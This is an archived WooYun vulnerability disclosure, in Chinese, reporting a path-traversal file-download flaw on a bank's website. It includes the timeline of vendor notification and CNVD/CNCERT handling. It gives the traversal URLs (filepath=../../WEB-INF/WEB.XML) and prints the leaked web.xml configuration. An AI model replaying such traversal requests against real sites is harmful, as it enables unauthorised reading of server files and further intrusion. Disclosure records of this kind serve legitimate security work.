乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-08: 细节已通知厂商并且等待厂商处理中 2015-01-13: 厂商已经确认,细节仅向厂商公开 2015-01-23: 细节向核心白帽子及相关领域专家公开 2015-02-02: 细节向普通白帽子公开 2015-02-12: 细节向实习白帽子公开 2015-02-22: 细节向公众公开
这个不知道到底算不算,先提交吧
http://bd-bank.com.cn/download/download.jsp?filepath=../../WEB-INF/WEB.XML
http://bd-bank.com.cn/download/download.jsp?filepath=download/download.jsp
<?xml version="1.0" encoding="UTF-8"?><!-- edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by rth77 (rth77) --><!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_4.dtd"><web-app> <session-config> <session-timeout>5</session-timeout> </session-config> <welcome-file-list> <welcome-file>index.jsp</welcome-file> <welcome-file>index.html</welcome-file> <welcome-file>index.htm</welcome-file> </welcome-file-list><error-page><error-code>404</error-code><location>/404.html</location></error-page><error-page><error-code>403</error-code><location>/404.html</location></error-page> <listener> <listener-class>ehm.db.HibernateInitStartUp</listener-class> </listener><listener> <listener-class>ehm.module.media.fun.MediaListener</listener-class> </listener> <listener> <listener-class>ehm.web.publish.fun.PublishInit</listener-class> </listener> <listener> <listener-class>ehm.module.reptile.fun.ReptileListener</listener-class> </listener> <servlet> <servlet-name>editorUpload</servlet-name> <servlet-class>ehm.module.editor.upload.UploadServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>editorUpload</servlet-name> <url-pattern>/editorupload</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>editorUpload</servlet-name> <url-pattern>/site067/editorupload</url-pattern> </servlet-mapping><context-param> <param-name>request.charsetencoding</param-name> <param-value>ISO-8859-1</param-value> </context-param> <security-constraint><web-resource-collection> <web-resource-name>public-resources</web-resource-name> <url-pattern>/*</url-pattern> <http-method>PUT</http-method><http-method>DELETE</http-method><http-method>HEAD</http-method><http-method>OPTIONS</http-method><http-method>TRACE</http-method></web-resource-collection><auth-constraint></auth-constraint> </security-constraint> <login-config> <auth-method>BASIC</auth-method> </login-config> </web-app>
危害等级:中
漏洞Rank:10
确认时间:2015-01-13 08:32
CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无